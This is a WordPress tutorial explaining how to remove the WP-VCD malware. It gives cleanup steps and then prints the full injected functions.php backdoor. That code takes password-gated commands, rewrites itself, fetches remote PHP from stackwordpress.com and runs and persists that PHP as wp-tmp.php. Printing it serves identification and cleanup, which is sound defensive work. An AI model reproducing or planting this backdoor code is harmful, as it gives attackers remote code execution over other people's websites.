WordPress Tutorials

How to Remove WP-VCD Malware Attack in WordPress

WP-VCD is a Malware Attack wp-vcd.php and wp-tmp.php malware file into WordPress WP-includes folder, WP-includes is a WordPress core file folder.

WP-VCD rewrites few important files function.php and post.php  file to put the malicious code and creates a secret admin login and hacker create a backdoor on your Cpanel to access files on your server.

How to Remove WP-VCD Malware

First create backup of the all files by cpanel/filezilla, it’s better option.

Then, remove WP-VCD.php file from WordPress core.

Go to the WordPress installation directory and get file wp-includes/wp-vcd.php which contain malware. Delete this file.

And also delete wp-tmp.php from same directory wp-includes/wp-tmp.php

Now open the function.php file to remove the malicious code. You can use any editor(Notepad++, sublime and Dreamviewer) if you don’t have then install any editor. Then open function.php and find(ctrl+f) to search the ending by this code “end_wp_theme_tmp ?>” this is the ending line of malware code. Select all of these upper code and remove it and then Save the file. Now upload the fresh file in folder.

Themes  Function file some server related code and script main themes and child themes for some function bellow here.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'sdfsdfsd'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='f008cf96406af32ae142ee92de8032e0';
if (($tmpcontent = @file_get_contents("http://stackwordpress.com/") OR $tmpcontent = @file_get_contents_tcurl("http://stackwordpress.com/")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://stackwordpress.com/") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://stackwordpress.com/") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>
Social Share

3 thoughts on “How to Remove WP-VCD Malware Attack in WordPress”

Leave a Comment